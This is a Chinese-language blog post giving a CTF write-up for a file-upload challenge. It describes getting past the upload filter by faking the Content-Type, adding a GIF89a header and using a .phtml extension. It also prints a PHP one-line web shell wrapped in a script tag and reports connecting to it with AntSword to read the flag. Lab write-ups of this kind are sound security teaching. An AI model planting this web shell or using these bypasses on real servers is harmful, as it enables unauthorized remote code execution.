随笔 - 51  文章 - 0  评论 - 4  阅读 - 19287

CTFer成长记录——CTF之Web专题·极客大挑战—Upload

一、题目链接

https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Upload

二、解法步骤

  本题是一个文件上传题目,先测试是黑名单还是白名单:随便上传一个文件,提示:

  看来只能上传图片类型,这个时候我们bp抓包并且修改包中的content字段,将其改成jpg等格式,同时给文件加上GIF89a来进行欺骗:

  修改后直接上传php还是会被检测,那么改成phtml:

  发现对文件内容进行了检测,不能有<? 这样php语言的特征,那么换一个一句话木马,用javascript写的:

  GIF89a 
  <script language="php">@eval($_REQUEST['cmd']);</script>一样bp抓包修改content:

  

  上传成功,然后用找到文件的上传目录:一般在upload下面:

  

  最后用蚁剑连接:

  

   最后在根目录下找到flag:

 三、总结

  本题文件上传对文件后缀进行了检查,可以用phtml绕过,如果对文件内容进行php特性检查,可以用js语言代替。

  

posted on   MiracleWolf  阅读(306)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

点击右上角即可分享
微信分享提示